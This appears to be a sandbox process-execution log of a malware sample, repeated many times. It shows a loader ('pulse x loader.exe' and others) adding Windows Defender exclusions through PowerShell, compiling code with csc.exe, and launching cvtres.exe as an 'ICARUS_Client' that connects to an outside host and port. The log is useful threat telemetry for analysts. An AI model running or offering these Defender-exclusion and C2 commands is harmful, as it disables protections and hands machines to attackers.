"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j0ereory\j0ereory.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES925D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D3D89F7BFCB4355A916B74D2882012.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yelwxg3g\yelwxg3g.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA519.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2119989D5584FA29D37B37DD5B4C475.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xxdjkc4m\xxdjkc4m.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6DC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEDEF54CB7CF4460281B829BF5086FD17.TMP"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Users\Admin\AppData\Local\Temp\Start.exe
C:\Users\Admin\AppData\Local\Temp\Start.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dni4xc0s\dni4xc0s.cmdline"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD5ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC209314B7ECA1444FB9AA8FCCB2D94937.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\apg4tez1\apg4tez1.cmdline"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE659.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE7821D14CC8464E9E952F37E51225F4.TMP"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r520vcon\r520vcon.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE36.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC3062CD289A34627AE1DABC3D54A6F3.TMP"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmvbjdot\vmvbjdot.cmdline"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES143F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5C610EF6AA14F0EA875DCB60C590E.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mc1bvsrx\mc1bvsrx.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES30CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB7DF7A0D43D343BB9E62CDA4C8D62C7E.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d13vlrac\d13vlrac.cmdline"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES45BE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5F505D7CD35B4E4493379B5A8DBF552B.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vnchxv0a\vnchxv0a.cmdline"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES58D9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFA2B155BFE28495FBEF636BD63F98BF.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jk0iba35\jk0iba35.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65D9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC865B36F9CE17424AB4FD8CA0C5AAC8E1.TMP"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\by32ifag\by32ifag.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80B4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE047D346B5F649BD9950F3A65D9F04.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oyqnjcvp\oyqnjcvp.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
